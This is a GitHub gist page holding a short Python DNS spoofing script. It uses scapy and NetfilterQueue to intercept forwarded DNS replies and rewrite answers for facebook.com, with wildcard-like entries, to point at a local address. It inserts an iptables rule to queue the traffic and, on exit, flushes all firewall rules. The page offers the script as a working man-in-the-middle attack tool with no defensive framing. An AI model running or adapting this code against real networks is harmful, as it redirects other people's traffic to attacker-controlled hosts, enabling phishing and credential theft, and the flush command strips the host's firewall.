Last active
November 2, 2020 16:07
-
-
Save An4ndita/26b155ad9dd1400ee5172698feb2df00 to your computer and use it in GitHub Desktop.
Dns spoofer program
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import scapy.all as scapy | |
from netfilterqueue import NetfilterQueue | |
import os | |
hosts = { | |
b"www.*.": "10.0.2.15", | |
b"*.com": "10.0.2.15", | |
b"facebook.com.": "10.0.2.15" | |
} | |
def pkt_process(packet): | |
scapy_packet = scapy.IP(packet.get_payload()) | |
if scapy_packet.haslayer(scapy.DNSRR): | |
print("[Before Modification ]:", scapy_packet.summary()) | |
try: | |
scapy_packet = modify_packet(scapy_packet) | |
except IndexError: | |
pass | |
print("[After Modification ]:", scapy_packet.summary()) | |
packet.set_payload(bytes(scapy_packet)) | |
packet.accept() | |
def modify_packet(packet): | |
qname = packet[scapy.DNSQR].qname | |
if qname not in hosts: | |
print("Invalid DNS Host:", qname) | |
return packet | |
packet[scapy.DNS].an = scapy.DNSRR(rrname=qname, rdata=hosts[qname]) | |
packet[scapy.DNS].ancount = 1 | |
del packet[scapy.IP].len | |
del packet[scapy.IP].chksum | |
del packet[scapy.UDP].len | |
del packet[scapy.UDP].chksum | |
return packet | |
QUEUE_NUM = 123 | |
# insert the iptables FORWARD rule | |
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM)) | |
q = NetfilterQueue() | |
try: | |
q.bind(QUEUE_NUM, pkt_process) | |
q.run() | |
except KeyboardInterrupt: | |
os.system("iptables --flush") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment